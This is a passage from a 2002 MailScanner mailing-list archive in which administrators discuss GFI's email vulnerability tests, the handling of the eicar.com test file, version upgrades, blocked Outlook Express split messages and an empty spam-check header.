time. It would be nice if this kind > > of directory versioning was incorporated into the tarfiles for v4 > > somehow... > > > > ** Jeff A. Earickson, Ph.D PHONE: 207-872-3659 > > ** Senior UNIX Sysadmin, Information Technology EMAIL: > jaearick@colby.edu > > ** Colby College, 4214 Mayflower Hill, FAX: 207-872-3076 > > ** Waterville ME, 04901-8842 > > ---------------------------------------------------------------------- > ---- > -- > > > > On Tue, 24 Sep 2002, Glynn S. Condez wrote: > > > > > Date: Tue, 24 Sep 2002 10:18:03 +0800 > > > From: Glynn S. Condez > > > Reply-To: MailScanner mailing list > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > Subject: Re: Email Vulnerabilities > > > > > > oh by the way, this the first time that I am going to upgrade the > > > mailscanner, is it possible if I am going to rename the old mailscanner > > > directory and install the new version of mailscanner as > > > mailscanner? > > > > > > or is there anything that I need to be reconfigure? > > > > > > Thanks > > > --- Glynn --- > > > > > > ----- Original Message ----- > > > From: "Glynn S. Condez" > > > To: > > > Sent: Tuesday, September 24, 2002 10:02 AM > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > This mailing list is great, the response is so fast :) well > > > > I'll do > the > > > > upgrade, email you guys about the results. > > > > > > > > thanks > > > > > > > > --- Glynn --- > > > > > > > > > > > > ----- Original Message ----- > > > > From: "Mike Kercher" > > > > To: > > > > Sent: Tuesday, September 24, 2002 10:05 AM > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > Try upgrading to 3.22-15 I think Julian got it to detect all > > > > > of the > > > > vulnerabilities. > > > > > > > > > > > > > > > -----Original Message----- > > > > > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > > > > Behalf Of Glynn S. Condez > > > > > Sent: Monday, September 23, 2002 8:58 PM > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > Subject: Email Vulnerabilities > > > > > > > > > > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, > > > > > some > of > > > the > > > > > test email that contents a test virus or codes goes through > > > > > and the > > > > > mailscanner doesn't detect the embedded scripts in the emails. > > > > > > > > > > In version 4, is it possible to scan these kinds of viruses or code? > by > > > > the > > > > > way I'm using the stable version of mailscanner 3-22.7 with > > > > > spamassassin2-31. > > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > From glynn at MAKATI.TECHSQUARE.COM Tue Sep 24 06:10:16 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities References: <000301c26388$93d61c60$6401a8c0@jamesdesktop> Message-ID: <018e01c26388$ac0f4860$8201a8c0@proaccessph.com> Yeah, I got three emails coming to my inbox and the emails are very clear. I only got this eicar.com email in my Deleted Items eventhough I haven't deleted. doest the mailscanner sends this to my Deleted Items coz SWEEP is not working anymore? --- Glynn --- ----- Original Message ----- From: "James Murchison" To: Sent: Tuesday, September 24, 2002 1:09 PM Subject: Re: Email Vulnerabilities > If your not getting the Virus Warning message the Scanner (Sweep) isn't > working. The {VIRUS} message is probably being generated by the allowed > files routine. If you have set your e-mail address as the postmaster, > you should receive at least two messages (probably 3) 1 the return > warning 2 the Postmaster warning and 3 the original message stripped. > > KR J. > > -----Original Message----- > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > Behalf Of Glynn S. Condez > Sent: Tuesday, 24 September 2002 2:54 PM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: Email Vulnerabilities > > > Hi guys, I just updated my mailscanner from 3.22-7 to 3.23-1 and what I > have found out is the speed, its more faster now and the the > vulnerability test from GFI doesn't work anyone. > > One thing I am wondering with, why does this eicar.com gfi test email > goes to my outlook express deleted items with a modified subject > {VIRUS?} eicar.com [1/5] up to [5/5] and theres no warning message in > the body and the attachment is intact with the filename eicar.com. im > just wondering about this. > > Also, I am using Sophos and I got this message in my console "Useful > life of SWEEP has beed exceeded" does the Sophos doesn't work anymore? > > > --- Glynn --- > > > ----- Original Message ----- > From: "Glynn S. Condez" > To: > Sent: Tuesday, September 24, 2002 10:37 AM > Subject: Re: Email Vulnerabilities > > > > Thanks Jeff for the great idea, it seems that there's nothing that I > > need to reconfigure except for the conf files of mailscanner. > > > > > > --- Glynn --- > > > > ----- Original Message ----- > > From: "Jeff A. Earickson" > > To: > > Sent: Tuesday, September 24, 2002 10:28 AM > > Subject: Re: Email Vulnerabilities > > > > > > > Hi, > > > I set up my mailscanner directory thus: > > > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 bin -> > bin-3.23-1/ > > > drwxr-xr-x 2 root none 1024 Sep 13 10:23 bin-3.22-14/ > > > drwxr-xr-x 2 root none 1024 Sep 23 13:46 bin-3.23-1/ > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 etc -> > etc-3.23-1/ > > > drwxr-xr-x 2 root none 1024 Sep 13 10:29 etc-3.22-14/ > > > drwxr-xr-x 2 root none 1024 Sep 23 13:55 etc-3.23-1/ > > > drwxr-xr-x 3 root none 512 May 2 11:52 man/ > > > drwxr-xr-x 8 jaearick jaearick 512 Sep 23 14:06 src/ > > > drwx------ 4 root none 512 May 3 09:38 var/ > > > > > > When a new version of mailscanner comes out, I untar it and move the > > > > mailscanner/etc and mailscanner/bin directories to etc-[version] and > > > > bin-[version]. Then I do side-by-side comparisons of the default > > > config versus my setup. When I've carried my config changes into > > > the new etc files, I stop mailscanner, change the symlinks, restart > > > mailscanner. Virtually no down time. It would be nice if this kind > > > > of directory versioning was incorporated into the tarfiles for v4 > > > somehow... > > > > > > ** Jeff A. Earickson, Ph.D PHONE: > 207-872-3659 > > > ** Senior UNIX Sysadmin, Information Technology EMAIL: > > jaearick@colby.edu > > > ** Colby College, 4214 Mayflower Hill, FAX: > 207-872-3076 > > > ** Waterville ME, 04901-8842 > > > > ---------------------------------------------------------------------- > > ---- > > -- > > > > > > On Tue, 24 Sep 2002, Glynn S. Condez wrote: > > > > > > > Date: Tue, 24 Sep 2002 10:18:03 +0800 > > > > From: Glynn S. Condez > > > > Reply-To: MailScanner mailing list > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > Subject: Re: Email Vulnerabilities > > > > > > > > oh by the way, this the first time that I am going to upgrade the > > > > mailscanner, is it possible if I am going to rename the old > mailscanner > > > > directory and install the new version of mailscanner as > > > > mailscanner? > > > > > > > > or is there anything that I need to be reconfigure? > > > > > > > > Thanks > > > > --- Glynn --- > > > > > > > > ----- Original Message ----- > > > > From: "Glynn S. Condez" > > > > To: > > > > Sent: Tuesday, September 24, 2002 10:02 AM > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > This mailing list is great, the response is so fast :) well > > > > > I'll > do > > the > > > > > upgrade, email you guys about the results. > > > > > > > > > > thanks > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > ----- Original Message ----- > > > > > From: "Mike Kercher" > > > > > To: > > > > > Sent: Tuesday, September 24, 2002 10:05 AM > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > Try upgrading to 3.22-15 I think Julian got it to detect all > > > > > > of > the > > > > > vulnerabilities. > > > > > > > > > > > > > > > > > > -----Original Message----- > > > > > > From: MailScanner mailing list > [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > > > > > Behalf Of Glynn S. Condez > > > > > > Sent: Monday, September 23, 2002 8:58 PM > > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > > Subject: Email Vulnerabilities > > > > > > > > > > > > > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, > > > > > > some > > of > > > > the > > > > > > test email that contents a test virus or codes goes through > > > > > > and > the > > > > > > mailscanner doesn't detect the embedded scripts in the emails. > > > > > > > > > > > > In version 4, is it possible to scan these kinds of viruses or > code? > > by > > > > > the > > > > > > way I'm using the stable version of mailscanner 3-22.7 with > > > > > > spamassassin2-31. > > > > > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > > > > > > > From pg at NEWHONEST.COM Tue Sep 24 06:54:56 2002 From: pg at NEWHONEST.COM (pg) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities References: <000301c26388$93d61c60$6401a8c0@jamesdesktop> <018e01c26388$ac0f4860$8201a8c0@proaccessph.com> Message-ID: <002c01c2638e$e9ba4600$2101a8c0@newhonest.com> Hi, I have the same problem. I think this is a new feature which prohibit "Split message" sent from outlook express. This could be quite a problem if we can't recieve "split message" because from time to time we have to receive big but splitted emails. Is there anyone who could help? -Jason ----- Original Message ----- From: "Glynn S. Condez" To: Sent: Tuesday, September 24, 2002 1:10 PM Subject: Re: Email Vulnerabilities > Yeah, I got three emails coming to my inbox and the emails are very clear. I > only got this eicar.com email in my Deleted Items eventhough I haven't > deleted. doest the mailscanner sends this to my Deleted Items coz SWEEP is > not working anymore? > > --- Glynn --- > > ----- Original Message ----- > From: "James Murchison" > To: > Sent: Tuesday, September 24, 2002 1:09 PM > Subject: Re: Email Vulnerabilities > > > > If your not getting the Virus Warning message the Scanner (Sweep) isn't > > working. The {VIRUS} message is probably being generated by the allowed > > files routine. If you have set your e-mail address as the postmaster, > > you should receive at least two messages (probably 3) 1 the return > > warning 2 the Postmaster warning and 3 the original message stripped. > > > > KR J. > > > > -----Original Message----- > > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > > Behalf Of Glynn S. Condez > > Sent: Tuesday, 24 September 2002 2:54 PM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: Re: Email Vulnerabilities > > > > > > Hi guys, I just updated my mailscanner from 3.22-7 to 3.23-1 and what I > > have found out is the speed, its more faster now and the the > > vulnerability test from GFI doesn't work anyone. > > > > One thing I am wondering with, why does this eicar.com gfi test email > > goes to my outlook express deleted items with a modified subject > > {VIRUS?} eicar.com [1/5] up to [5/5] and theres no warning message in > > the body and the attachment is intact with the filename eicar.com. im > > just wondering about this. > > > > Also, I am using Sophos and I got this message in my console "Useful > > life of SWEEP has beed exceeded" does the Sophos doesn't work anymore? > > > > > > --- Glynn --- > > > > > > ----- Original Message ----- > > From: "Glynn S. Condez" > > To: > > Sent: Tuesday, September 24, 2002 10:37 AM > > Subject: Re: Email Vulnerabilities > > > > > > > Thanks Jeff for the great idea, it seems that there's nothing that I > > > need to reconfigure except for the conf files of mailscanner. > > > > > > > > > --- Glynn --- > > > > > > ----- Original Message ----- > > > From: "Jeff A. Earickson" > > > To: > > > Sent: Tuesday, September 24, 2002 10:28 AM > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > Hi, > > > > I set up my mailscanner directory thus: > > > > > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 bin -> > > bin-3.23-1/ > > > > drwxr-xr-x 2 root none 1024 Sep 13 10:23 bin-3.22-14/ > > > > drwxr-xr-x 2 root none 1024 Sep 23 13:46 bin-3.23-1/ > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 etc -> > > etc-3.23-1/ > > > > drwxr-xr-x 2 root none 1024 Sep 13 10:29 etc-3.22-14/ > > > > drwxr-xr-x 2 root none 1024 Sep 23 13:55 etc-3.23-1/ > > > > drwxr-xr-x 3 root none 512 May 2 11:52 man/ > > > > drwxr-xr-x 8 jaearick jaearick 512 Sep 23 14:06 src/ > > > > drwx------ 4 root none 512 May 3 09:38 var/ > > > > > > > > When a new version of mailscanner comes out, I untar it and move the > > > > > > mailscanner/etc and mailscanner/bin directories to etc-[version] and > > > > > > bin-[version]. Then I do side-by-side comparisons of the default > > > > config versus my setup. When I've carried my config changes into > > > > the new etc files, I stop mailscanner, change the symlinks, restart > > > > mailscanner. Virtually no down time. It would be nice if this kind > > > > > > of directory versioning was incorporated into the tarfiles for v4 > > > > somehow... > > > > > > > > ** Jeff A. Earickson, Ph.D PHONE: > > 207-872-3659 > > > > ** Senior UNIX Sysadmin, Information Technology EMAIL: > > > jaearick@colby.edu > > > > ** Colby College, 4214 Mayflower Hill, FAX: > > 207-872-3076 > > > > ** Waterville ME, 04901-8842 > > > > > > ---------------------------------------------------------------------- > > > ---- > > > -- > > > > > > > > On Tue, 24 Sep 2002, Glynn S. Condez wrote: > > > > > > > > > Date: Tue, 24 Sep 2002 10:18:03 +0800 > > > > > From: Glynn S. Condez > > > > > Reply-To: MailScanner mailing list > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > oh by the way, this the first time that I am going to upgrade the > > > > > mailscanner, is it possible if I am going to rename the old > > mailscanner > > > > > directory and install the new version of mailscanner as > > > > > mailscanner? > > > > > > > > > > or is there anything that I need to be reconfigure? > > > > > > > > > > Thanks > > > > > --- Glynn --- > > > > > > > > > > ----- Original Message ----- > > > > > From: "Glynn S. Condez" > > > > > To: > > > > > Sent: Tuesday, September 24, 2002 10:02 AM > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > This mailing list is great, the response is so fast :) well > > > > > > I'll > > do > > > the > > > > > > upgrade, email you guys about the results. > > > > > > > > > > > > thanks > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > > > > ----- Original Message ----- > > > > > > From: "Mike Kercher" > > > > > > To: > > > > > > Sent: Tuesday, September 24, 2002 10:05 AM > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > Try upgrading to 3.22-15 I think Julian got it to detect all > > > > > > > of > > the > > > > > > vulnerabilities. > > > > > > > > > > > > > > > > > > > > > -----Original Message----- > > > > > > > From: MailScanner mailing list > > [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > > > > > > Behalf Of Glynn S. Condez > > > > > > > Sent: Monday, September 23, 2002 8:58 PM > > > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > > > Subject: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, > > > > > > > some > > > of > > > > > the > > > > > > > test email that contents a test virus or codes goes through > > > > > > > and > > the > > > > > > > mailscanner doesn't detect the embedded scripts in the emails. > > > > > > > > > > > > > > In version 4, is it possible to scan these kinds of viruses or > > code? > > > by > > > > > > the > > > > > > > way I'm using the stable version of mailscanner 3-22.7 with > > > > > > > spamassassin2-31. > > > > > > > > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > > > > > > > > > > > > > > From gerry at DORFAM.CA Tue Sep 24 07:18:04 2002 From: gerry at DORFAM.CA (Gerry Doris) Date: Thu Jan 12 21:15:45 2006 Subject: Spam Header Problem Message-ID: I've been playing with version 3-23.1 and have run into a small problem with the spam header. I turned off spam checking but then get a blank spam header ie "X-MailScanner-SpamCheck:" no matter what I do. I've tried commenting the line out in mailscanner.conf but that generates a SYSERR. -- Gerry "The lyfe so short, the craft so long to learne" Chaucer From evertjan at VANRAMSELAAR.NL Tue Sep 24 07:26:07 2002 From: evertjan at VANRAMSELAAR.NL (Evert Jan van Ramselaar) Date: Thu Jan 12 21:15:45 2006 Subject: Spam Header Problem In-Reply-To: References: Message-ID: <53801.194.151.195.222.1032848767.squirrel@mail.vanramselaar.nl> Gerry Doris said: > I've been playing with version 3-23.1 and have run into a small problem > with the spam header. I turned off spam checking but then get a blank > spam header ie "X-MailScanner-SpamCheck:" no matter what I do. Now that you mention it... same here. -- Evert Jan van Ramselaar Van Ramselaar Info Tech From evertjan at VANRAMSELAAR.NL Tue Sep 24 07:31:19 2002 From: evertjan at VANRAMSELAAR.NL (Evert Jan van Ramselaar) Date: Thu Jan 12 21:15:45 2006 Subject: Spam Header Problem In-Reply-To: <53801.194.151.195.222.1032848767.squirrel@mail.vanramselaar.nl> References: <53801.194.151.195.222.1032848767.squirrel@mail.vanramselaar.nl> Message-ID: <56913.194.151.195.222.1032849079.squirrel@mail.vanramselaar.nl> Evert Jan van Ramselaar said: > Gerry Doris said: >> I've been playing with version 3-23.1 and have run into a small >> problem with the spam header. I turned off spam checking but then get >> a blank spam header ie "X-MailScanner-SpamCheck:" no matter what I do. > > Now that you mention it... same here. Sorry, I should tell the truth... ;p I had only looked at the headers of Gerry's messages, which already had the X-MailScanner-SpamCheck header in it. My configuration does not add that header. So it's NOT the same here... -- Evert Jan van Ramselaar Van Ramselaar Info Tech From glynn at MAKATI.TECHSQUARE.COM Tue Sep 24 07:38:23 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities References: <000301c26388$93d61c60$6401a8c0@jamesdesktop> <018e01c26388$ac0f4860$8201a8c0@proaccessph.com> <002c01c2638e$e9ba4600$2101a8c0@newhonest.com> Message-ID: <025201c26394$fb4507b0$8201a8c0@proaccessph.com> What is this split message all about? is it a new feature of mailscanner? --- Glynn --- ----- Original Message ----- From: "pg" To: Sent: Tuesday, September 24, 2002 1:54 PM Subject: Re: Email Vulnerabilities > Hi, I have the same problem. I think this is a new feature which prohibit > "Split message" sent from outlook express. This could be quite a problem if > we can't recieve "split message" because from time to time we have to > receive big but splitted emails. Is there anyone who could help? > > -Jason > ----- Original Message ----- > From: "Glynn S. Condez" > To: > Sent: Tuesday, September 24, 2002 1:10 PM > Subject: Re: Email Vulnerabilities > > > > Yeah, I got three emails coming to my inbox and the emails are very clear. > I > > only got this eicar.com email in my Deleted Items eventhough I haven't > > deleted. doest the mailscanner sends this to my Deleted Items coz SWEEP is > > not working anymore? > > > > --- Glynn --- > > > > ----- Original Message ----- > > From: "James Murchison" > > To: > > Sent: Tuesday, September 24, 2002 1:09 PM > > Subject: Re: Email Vulnerabilities > > > > > > > If your not getting the Virus Warning message the Scanner (Sweep) isn't > > > working. The {VIRUS} message is probably being generated by the allowed > > > files routine. If you have set your e-mail address as the postmaster, > > > you should receive at least two messages (probably 3) 1 the return > > > warning 2 the Postmaster warning and 3 the original message stripped. > > > > > > KR J. > > > > > > -----Original Message----- > > > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > > > Behalf Of Glynn S. Condez > > > Sent: Tuesday, 24 September 2002 2:54 PM > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > Subject: Re: Email Vulnerabilities > > > > > > > > > Hi guys, I just updated my mailscanner from 3.22-7 to 3.23-1 and what I > > > have found out is the speed, its more faster now and the the > > > vulnerability test from GFI doesn't work anyone. > > > > > > One thing I am wondering with, why does this eicar.com gfi test email > > > goes to my outlook express deleted items with a modified subject > > > {VIRUS?} eicar.com [1/5] up to [5/5] and theres no warning message in > > > the body and the attachment is intact with the filename eicar.com. im > > > just wondering about this. > > > > > > Also, I am using Sophos and I got this message in my console "Useful > > > life of SWEEP has beed exceeded" does the Sophos doesn't work anymore? > > > > > > > > > --- Glynn --- > > > > > > > > > ----- Original Message ----- > > > From: "Glynn S. Condez" > > > To: > > > Sent: Tuesday, September 24, 2002 10:37 AM > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > Thanks Jeff for the great idea, it seems that there's nothing that I > > > > need to reconfigure except for the conf files of mailscanner. > > > > > > > > > > > > --- Glynn --- > > > > > > > > ----- Original Message ----- > > > > From: "Jeff A. Earickson" > > > > To: > > > > Sent: Tuesday, September 24, 2002 10:28 AM > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > Hi, > > > > > I set up my mailscanner directory thus: > > > > > > > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 bin -> > > > bin-3.23-1/ > > > > > drwxr-xr-x 2 root none 1024 Sep 13 10:23 bin-3.22-14/ > > > > > drwxr-xr-x 2 root none 1024 Sep 23 13:46 bin-3.23-1/ > > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 etc -> > > > etc-3.23-1/ > > > > > drwxr-xr-x 2 root none 1024 Sep 13 10:29 etc-3.22-14/ > > > > > drwxr-xr-x 2 root none 1024 Sep 23 13:55 etc-3.23-1/ > > > > > drwxr-xr-x 3 root none 512 May 2 11:52 man/ > > > > > drwxr-xr-x 8 jaearick jaearick 512 Sep 23 14:06 src/ > > > > > drwx------ 4 root none 512 May 3 09:38 var/ > > > > > > > > > > When a new version of mailscanner comes out, I untar it and move the > > > > > > > > mailscanner/etc and mailscanner/bin directories to etc-[version] and > > > > > > > > bin-[version]. Then I do side-by-side comparisons of the default > > > > > config versus my setup. When I've carried my config changes into > > > > > the new etc files, I stop mailscanner, change the symlinks, restart > > > > > mailscanner. Virtually no down time. It would be nice if this kind > > > > > > > > of directory versioning was incorporated into the tarfiles for v4 > > > > > somehow... > > > > > > > > > > ** Jeff A. Earickson, Ph.D PHONE: > > > 207-872-3659 > > > > > ** Senior UNIX Sysadmin, Information Technology EMAIL: > > > > jaearick@colby.edu > > > > > ** Colby College, 4214 Mayflower Hill, FAX: > > > 207-872-3076 > > > > > ** Waterville ME, 04901-8842 > > > > > > > > ---------------------------------------------------------------------- > > > > ---- > > > > -- > > > > > > > > > > On Tue, 24 Sep 2002, Glynn S. Condez wrote: > > > > > > > > > > > Date: Tue, 24 Sep 2002 10:18:03 +0800 > > > > > > From: Glynn S. Condez > > > > > > Reply-To: MailScanner mailing list > > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > oh by the way, this the first time that I am going to upgrade the > > > > > > mailscanner, is it possible if I am going to rename the old > > > mailscanner > > > > > > directory and install the new version of mailscanner as > > > > > > mailscanner? > > > > > > > > > > > > or is there anything that I need to be reconfigure? > > > > > > > > > > > > Thanks > > > > > > --- Glynn --- > > > > > > > > > > > > ----- Original Message ----- > > > > > > From: "Glynn S. Condez" > > > > > > To: > > > > > > Sent: Tuesday, September 24, 2002 10:02 AM > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > This mailing list is great, the response is so fast :) well > > > > > > > I'll > > > do > > > > the > > > > > > > upgrade, email you guys about the results. > > > > > > > > > > > > > > thanks > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > > > > > > > ----- Original Message ----- > > > > > > > From: "Mike Kercher" > > > > > > > To: > > > > > > > Sent: Tuesday, September 24, 2002 10:05 AM > > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > > > > Try upgrading to 3.22-15 I think Julian got it to detect all > > > > > > > > of > > > the > > > > > > > vulnerabilities. > > > > > > > > > > > > > > > > > > > > > > > > -----Original Message----- > > > > > > > > From: MailScanner mailing list > > > [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > > > > > > > Behalf Of Glynn S. Condez > > > > > > > > Sent: Monday, September 23, 2002 8:58 PM > > > > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > > > > Subject: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, > > > > > > > > some > > > > of > > > > > > the > > > > > > > > test email that contents a test virus or codes goes through > > > > > > > > and > > > the > > > > > > > > mailscanner doesn't detect the embedded scripts in the emails. > > > > > > > > > > > > > > > > In version 4, is it possible to scan these kinds of viruses or > > > code? > > > > by > > > > > > > the > > > > > > > > way I'm using the stable version of mailscanner 3-22.7 with > > > > > > > > spamassassin2-31. > > > > > > > > > > > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > From pg at NEWHONEST.COM Tue Sep 24 07:54:38 2002 From: pg at NEWHONEST.COM (pg) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities References: <000301c26388$93d61c60$6401a8c0@jamesdesktop> <018e01c26388$ac0f4860$8201a8c0@proaccessph.com> <002c01c2638e$e9ba4600$2101a8c0@newhonest.com> <025201c26394$fb4507b0$8201a8c0@proaccessph.com> Message-ID: <002101c26397$435439c0$2101a8c0@newhonest.com> outlook express could split an oversized email into a few smaller emails. It will display something like [1/5] .... [5/5] in the subject line of each split message. And when another outlook express received it (them), it will join all of them (in this example, 5 of them) into one big email. Since someone (bugtraq) reported that this could be a vulnerability, mailscanner is modified to block it. Sorry that tell you that I'm only a normal user to mailscanner (oh mailscanner is so great!!!!). All the above comments are my own understanding, not surely correct. -Jason ----- Original Message ----- From: "Glynn S. Condez" To: Sent: Tuesday, September 24, 2002 2:38 PM Subject: Re: Email Vulnerabilities > What is this split message all about? is it a new feature of mailscanner? > > --- Glynn --- > > ----- Original Message ----- > From: "pg" > To: > Sent: Tuesday, September 24, 2002 1:54 PM > Subject: Re: Email Vulnerabilities > > > > Hi, I have the same problem. I think this is a new feature which prohibit > > "Split message" sent from outlook express. This could be quite a problem > if > > we can't recieve "split message" because from time to time we have to > > receive big but splitted emails. Is there anyone who could help? > > > > -Jason > > ----- Original Message ----- > > From: "Glynn S. Condez" > > To: > > Sent: Tuesday, September 24, 2002 1:10 PM > > Subject: Re: Email Vulnerabilities > > > > > > > Yeah, I got three emails coming to my inbox and the emails are very > clear. > > I > > > only got this eicar.com email in my Deleted Items eventhough I haven't > > > deleted. doest the mailscanner sends this to my Deleted Items coz SWEEP > is > > > not working anymore? > > > > > > --- Glynn --- > > > > > > ----- Original Message ----- > > > From: "James Murchison" > > > To: > > > Sent: Tuesday, September 24, 2002 1:09 PM > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > If your not getting the Virus Warning message the Scanner (Sweep) > isn't > > > > working. The {VIRUS} message is probably being generated by the > allowed > > > > files routine. If you have set your e-mail address as the postmaster, > > > > you should receive at least two messages (probably 3) 1 the return > > > > warning 2 the Postmaster warning and 3 the original message stripped. > > > > > > > > KR J. > > > > > > > > -----Original Message----- > > > > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > > > > Behalf Of Glynn S. Condez > > > > Sent: Tuesday, 24 September 2002 2:54 PM > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > Hi guys, I just updated my mailscanner from 3.22-7 to 3.23-1 and what > I > > > > have found out is the speed, its more faster now and the the > > > > vulnerability test from GFI doesn't work anyone. > > > > > > > > One thing I am wondering with, why does this eicar.com gfi test email > > > > goes to my outlook express deleted items with a modified subject > > > > {VIRUS?} eicar.com [1/5] up to [5/5] and theres no warning message in > > > > the body and the attachment is intact with the filename eicar.com. im > > > > just wondering about this. > > > > > > > > Also, I am using Sophos and I got this message in my console "Useful > > > > life of SWEEP has beed exceeded" does the Sophos doesn't work anymore? > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > ----- Original Message ----- > > > > From: "Glynn S. Condez" > > > > To: > > > > Sent: Tuesday, September 24, 2002 10:37 AM > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > Thanks Jeff for the great idea, it seems that there's nothing that > I > > > > > need to reconfigure except for the conf files of mailscanner. > > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > ----- Original Message ----- > > > > > From: "Jeff A. Earickson" > > > > > To: > > > > > Sent: Tuesday, September 24, 2002 10:28 AM > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > Hi, > > > > > > I set up my mailscanner directory thus: > > > > > > > > > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 bin -> > > > > bin-3.23-1/ > > > > > > drwxr-xr-x 2 root none 1024 Sep 13 10:23 bin-3.22-14/ > > > > > > drwxr-xr-x 2 root none 1024 Sep 23 13:46 bin-3.23-1/ > > > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 etc -> > > > > etc-3.23-1/ > > > > > > drwxr-xr-x 2 root none 1024 Sep 13 10:29 etc-3.22-14/ > > > > > > drwxr-xr-x 2 root none 1024 Sep 23 13:55 etc-3.23-1/ > > > > > > drwxr-xr-x 3 root none 512 May 2 11:52 man/ > > > > > > drwxr-xr-x 8 jaearick jaearick 512 Sep 23 14:06 src/ > > > > > > drwx------ 4 root none 512 May 3 09:38 var/ > > > > > > > > > > > > When a new version of mailscanner comes out, I untar it and move > the > > > > > > > > > > mailscanner/etc and mailscanner/bin directories to etc-[version] > and > > > > > > > > > > bin-[version]. Then I do side-by-side comparisons of the default > > > > > > config versus my setup. When I've carried my config changes into > > > > > > the new etc files, I stop mailscanner, change the symlinks, > restart > > > > > > mailscanner. Virtually no down time. It would be nice if this > kind > > > > > > > > > > of directory versioning was incorporated into the tarfiles for v4 > > > > > > somehow... > > > > > > > > > > > > ** Jeff A. Earickson, Ph.D PHONE: > > > > 207-872-3659 > > > > > > ** Senior UNIX Sysadmin, Information Technology EMAIL: > > > > > jaearick@colby.edu > > > > > > ** Colby College, 4214 Mayflower Hill, FAX: > > > > 207-872-3076 > > > > > > ** Waterville ME, 04901-8842 > > > > > > > > > > > ---------------------------------------------------------------------- > > > > > ---- > > > > > -- > > > > > > > > > > > > On Tue, 24 Sep 2002, Glynn S. Condez wrote: > > > > > > > > > > > > > Date: Tue, 24 Sep 2002 10:18:03 +0800 > > > > > > > From: Glynn S. Condez > > > > > > > Reply-To: MailScanner mailing list > > > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > oh by the way, this the first time that I am going to upgrade > the > > > > > > > mailscanner, is it possible if I am going to rename the old > > > > mailscanner > > > > > > > directory and install the new version of mailscanner as > > > > > > > mailscanner? > > > > > > > > > > > > > > or is there anything that I need to be reconfigure? > > > > > > > > > > > > > > Thanks > > > > > > > --- Glynn --- > > > > > > > > > > > > > > ----- Original Message ----- > > > > > > > From: "Glynn S. Condez" > > > > > > > To: > > > > > > > Sent: Tuesday, September 24, 2002 10:02 AM > > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > > > > This mailing list is great, the response is so fast :) well > > > > > > > > I'll > > > > do > > > > > the > > > > > > > > upgrade, email you guys about the results. > > > > > > > > > > > > > > > > thanks > > > > > > > > > > > > > > > > --- Glynn 